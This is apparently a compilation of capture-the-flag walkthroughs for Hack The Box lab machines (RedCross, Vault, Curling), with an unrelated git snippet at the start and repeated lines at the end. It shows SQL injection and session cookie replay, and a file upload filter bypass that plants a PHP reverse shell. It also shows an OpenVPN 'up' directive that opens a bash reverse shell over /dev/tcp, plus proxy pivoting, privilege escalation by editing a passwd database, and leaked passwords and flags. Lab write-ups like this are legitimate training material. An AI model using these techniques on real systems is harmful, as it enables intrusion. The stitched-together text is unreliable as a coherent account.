Update forked repository after update of remote master branch.
Solution
# register remote repository as "upstream".$ git remote add upstream https://github.com/XXXXXXX/XXXXXXX.git
# update information of remote repository local repository has$ git fetch upstream
# checkout to local master branch$ git checkout master
# merge original master branch to local master$ git merge --ff upstream/master
Besides, we can find an interesting pdf under the directory “/documents”
By sending following message, we can create a new credential “guest:guest”.
We can login to the console with a credential “guest:guest”.
If we put a single quote in a UserID and submit, we receive followin message.
This means this webapp has SQLinjection vulnerability.
In this case, the url we are redirected is following.
https://intra.redcross.htb/?o=%27&page=app
Now we have following query and we have to put something into single quote.
or dest like ''
We can put % there and we can achieve following output.
Sounds like we have admin webapp and we have sub domain for that.
Add following line in “/etc/hosts” and try to access.
10.10.10.113 admin.redcross.htb
We can find another login console.
we can try the credential “guest:guest”. However, it shows a message we don’t have enough privilege.
Then, try to do session replay attack.
Open Burp Suite and check the “PHPSESSID” in the Cookie when we accessed “intra.redcross.htb”.
Then, turn intercept on and try to access “admin.redcross.htb”.
check the value of “PHPSESSID” in the cookie and change the value to the above session id.
We have to modify following 3 requests.
Then, we can access to the admin console of “admin.redcross.htb”.
With accessing “User Management”, we can create a new user on redcross.
We cam use this credential for ssh login.
inari:YfXHf8ta
root@kali:~# ssh inari@10.10.10.113
inari@10.10.10.113's password: # YfXHf8ta
Linux redcross 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=2020 gid=1001(associates) groups=1001(associates)
We can confirm we’re in a “jail”.
$ cd-bash: cd: /var/jail/home: No such file or directory
We can enumerate some directories. However, there is nothing interesting.
Then, go back to admin console. We still have another page “Firewall”.
By providing our ip, we can put in in a “whitelist” of “firewall”.
Try to scan the ports again.
root@kali:~# nmap -p--sC-sV 10.10.10.113
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 12:59 EEST
Nmap scan report for intra.redcross.htb (10.10.10.113)
Host is up (0.035s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
| 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open ssl/http Apache httpd 2.4.25
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /?page=login
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after: 2021-02-27T19:46:58
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
~~~
| http/1.1
|_ http/1.1
1025/tcp open NFS-or-IIS?
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
| Fpostmaster.c
| L2030
|_ RProcessStartupPacket
| ssl-cert: Subject: commonName=redcross.redcross.htb
| Subject Alternative Name: DNS:redcross.redcross.htb
| Not valid before: 2018-06-03T19:13:20
|_Not valid after: 2028-05-31T19:13:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.70%I=7%D=4/14%Time=5CB304BA%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronten
SF:d\x20protocol\x2065363\.19778:\x20server\x20supports\x201\.0\x20to\x203
SF:\.0\0Fpostmaster\.c\0L2030\0RProcessStartupPacket\0\0");
Service Info: Hosts: RedCross, redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 344.69 seconds
We can find additional service port 1025 and port 5432.
By connecting with nc and waiting for a while, port 1025 give us a response.
unix=> update passwd_table set gid = 27 where uid = 2020;
update passwd_table set gid = 27 where uid = 2020;
UPDATE 1
unix=> update passwd_table set homedir ='/root' where uid = 2020;
update passwd_table set homedir ='/root' where uid = 2020;
UPDATE 1
unix=>select* from passwd_table;select* from passwd_table;
WARNING: terminal is not fully functional
- (press RETURN)
username | passwd | uid | gid | gecos | homedi
r | shell
----------+------------------------------------+------+------+-------+----------
------+-----------
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail
/home | /bin/bash
inari | $1$oJkderY0$RHUnmknSOSToS9HpHcVaP1 | 2020 | 27 | | /root
| /bin/bash
(2 rows)
Then, login as user inari with ssh.
Since group “sudo” can execute any command as root on this server, we can achieve a root shell by command “sudo -s”.
root@kali:~# ssh inari@10.10.10.113
inari@10.10.10.113's password:
Linux redcross 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 07:31:53 2019 from 10.10.14.23
Could not chdir to home directory /root: Permission denied
-bash: /root/.bash_profile: Permission denied
inari@redcross:/$ sudo -s
[sudo] password for inari:
root@redcross:/# cd /root
root@redcross:~# cat root.txt
892a1f4d018e5d382c4f5ee1b26717a4
In index.php, there is a message “We are proud to announce our first client: Sparklays (Sparklays.com still under construction)”.
Try to access to /sparklays.
In “/sparklays/design/design.html”, we have a link to “/sparklays/design/changelogo.php”.
“changelogo.php” has a form which we can upload a file.
If we upload a image file, we can find it in the directory “/sparklays/design/uploads/”.
This form has file upload restriction but by changing file extension to “php5” and Content-type, we can bypass the restriction.
By accessing uploaded php code, we can achieve a reverse shell.
# Access http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN)[10.10.10.109] 37380
Linux ubuntu 4.13.0-45-generic #50~16.04.1-Ubuntu SMP Wed May 30 11:18:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
05:43:31 up 8:51, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data)gid=33(www-data)groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
In “/home/dave/Desktop”, we can find interesting files.
$ pwd
/home/dave/Desktop
$ ls-la
total 20
drwxr-xr-x 2 dave dave 4096 Sep 3 2018 .
drwxr-xr-x 18 dave dave 4096 Sep 3 2018 ..
-rw-rw-r-- 1 alex alex 74 Jul 17 2018 Servers
-rw-rw-r-- 1 alex alex 14 Jul 17 2018 key
-rw-rw-r-- 1 alex alex 20 Jul 17 2018 ssh
In the contents of “/home/dave/Desktop/ssh”, there is a ssh credential.
dave:Dav3therav3123
We can have a ssh connection by taking advantage of that.
root@kali:~# ssh dave@10.10.10.109
dave@10.10.10.109's password: # Dav3therav3123
~~~
Last login: Sun Sep 2 07:17:32 2018 from 192.168.1.11
dave@ubuntu:~$
In the home directory, there is also an interesting file.
dave@ubuntu:~/Desktop$ cat Servers
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
Besides, in”keys”, we can find a simple text.
dave@ubuntu:~/Desktop$ cat key
itscominghome
We can execute nmap scanning for these servers by using Proxychains.
At first, add some settings in “/etc/proxychains.conf”
root@kali:~# tail /etc/proxychains.conf
## proxy types: http, socks4, socks5# ( auth types supported: "basic"-http "user/pass"-socks )#[ProxyList]
# add proxy here ...# meanwile# defaults set to "tor"
socks4 127.0.0.1 9050
Then, create a ssh connection.
root@kali:~# ssh -D 9050 dave@10.10.10.109
Then, execute following command.
We can figure out on 192.168.122.4, ssh and http is running.
root@kali:~# proxychains nmap 10.10.10.109
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 18:20 EEST
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.109:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.109:22-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.109:139-<--timeout
~~~
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:19350-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:9101-<--timeout
Nmap scan report for 192.168.122.4
Host is up (0.036s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 36.08 seconds
Then, seeing what is the content of http server.
root@kali:~# proxychains curl http://192.168.122.4/
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:80-<><>-OK
<h1> Welcome to the Sparklays DNS Server </h1>
<p>
<a href="dns-config.php">Click here to modify your DNS Settings</a><br>
<a href="vpnconfig.php">Click here to test your VPN Configuration</a>
We can try to open this website with browser(But generally don’t run web browser with root !!)
In “/vpnconfig.php”, we can find a form which we can edit / execute .ovpn file.
After running netcat, by posting following data with “vpnconfig.php”, we can achieve a reverse shell from VM “DNS”
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/4444 0>&1'"
dave@ubuntu:~$ nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.122.4] port 4444 [tcp/*] accepted (family 2, sport 35236)
bash: cannot set terminal process group (1123): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html#
In directory “/home/dave” on DNS, we can find an interesting file.
root@DNS:/home/dave# cat ssh
cat ssh
dave
dav3gerous567
This is a credential which we can access “DNS” with ssh.
dave@ubuntu:~$ ssh dave@192.168.122.4
dave@192.168.122.4's password: # dav3gerous567
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)
~~~
Last login: Sat Apr 6 10:28:23 2019 from 192.168.122.1
dave@DNS:~$
By following command, we can figure out that we can execute any command as root.
dave@DNS:/home$ sudo-l[sudo] password for dave:
Matching Defaults entries for dave on DNS:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dave may run the following commands on DNS:
(ALL : ALL) ALL
Besides, in “/etc/hosts”, we can find an IP address of “vault”
dave@DNS:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 DNS
192.168.5.2 Vault
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
If we try to find this IP address in other place, we can find “auth.log”.
This looks like trying to execute nmap from port -4444.
If we execute these command, we can see unknown service is running on port 987
root@DNS:~# nmap 192.168.5.2 --source-port=4444
Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-06 22:50 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
987/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 25.84 seconds
If we don’t specify the option “–source-port=4444”, we don’t see any result.
root@DNS:~# nmap 192.168.5.2
Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-06 22:53 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
By running nc from DNS, we can figure out the service running on port 987 is ssh
We can confirm that we opened port 1234 on localhost by “netstat”
root@DNS:~# netstat -nlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 14274/ncat
By following command, we can connect to VM “Vault”.
root@DNS:~# ssh dave@127.0.0.1 -p 1234
dave@127.0.0.1's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)
~~~
Last login: Sat Apr 6 12:36:57 2019 from 192.168.122.4
dave@vault:~$
In the home directory of dave, we can find a gyg encrypted file “root.txt.png”.
dave@vault:~$ ls-l
total 4
-rw-rw-r-- 1 dave dave 629 Sep 3 2018 root.txt.gpg
dave@vault:~$ file root.txt.gpg
root.txt.gpg: PGP RSA encrypted session key - keyid: 10C678C7 31FEBD1 RSA (Encrypt or Sign) 4096b .
It seems like we need a secret key to encrypt this file.
dave@vault:~$ gpg -d root.txt.gpg
gpg: directory `/home/dave/.gnupg' created
gpg: new configuration file `/home/dave/.gnupg/gpg.conf' created
gpg: WARNING: options in`/home/dave/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/dave/.gnupg/secring.gpg' created
gpg: keyring `/home/dave/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available
We need a secret key file for gpg file. We can find it on VM “ubuntu” by command “gpg –list-secret-keys”.
We can decrypt root.txt.gpg by key “itscominghome” in the same directory.
dave@ubuntu:~$ cat Desktop/key
itscominghome
dave@ubuntu:~$ gpg -d root.txt.gpg
You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
"david <dave@david.com>"
ca468370b91d1f5906e31093d9bfe819
Now we have a control of admin console.
Try to upload our shellcode. Go to “Extensions” -> “Templates” -> “Templates”.
Then choose “Protostar Details and Files” -> “index.php”
Now we have a console which we can edit the source code of index.php.
Let’s add reverse shell code (example) here and access “http://10.10.10.150/index.php”. We can achieve a reverse shell.
# on localhost
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN)[10.10.10.150] 43324
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
14:32:45 up 3 days, 3:27, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data)gid=33(www-data)groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
However, we still do not have access permission to user.txt
Then, extract data from the compressed bzip2 file.
We got a gzip compressed file.
root@kali:~# mv password_backup_bin.txt password_backup_bin.bz2
root@kali:~# bunzip2 password_backup_bin.bz2
root@kali:~# ls
Desktop Downloads password_backup Pictures Templates
Documents Music password_backup_bin Public Videos
root@kali:~# file password_backup_bin
password_backup_bin: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size 141
Extract compressed file again.
We got a new bzip2 file.
root@kali:~# mv password_backup_bin password_backup_bin.gz
root@kali:~# gunzip password_backup_bin.gz
root@kali:~# ls
Desktop Documents Downloads Music password_backup password_backup_bin Pictures Public Templates Videos
root@kali:~# file password_backup_bin
password_backup_bin: bzip2 compressed data, block size = 900k
Extract new bzip2 file. We can obtain a tar file.
root@kali:~# mv password_backup_bin password_backup_bin.bz2
root@kali:~# ls
Desktop Documents Downloads Music password_backup password_backup_bin Pictures Public Templates Videos
root@kali:~# file password_backup_bin
password_backup_bin: POSIX tar archive (GNU)
Finally extract tar archive we achieved last step. We can get an interesting file “password.txt”.
With accessing “User Management”, we can create a new user on redcross.
Try to access to /sparklays.
